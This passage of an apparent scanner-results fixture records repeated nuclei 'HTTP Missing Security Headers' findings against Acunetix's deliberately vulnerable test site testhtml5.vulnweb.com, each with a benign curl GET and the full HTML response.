null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 323, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:40:50.093Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 324, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:40:50.218Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 325, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:40:50.354Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 326, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:40:50.482Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 327, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:40:50.612Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" 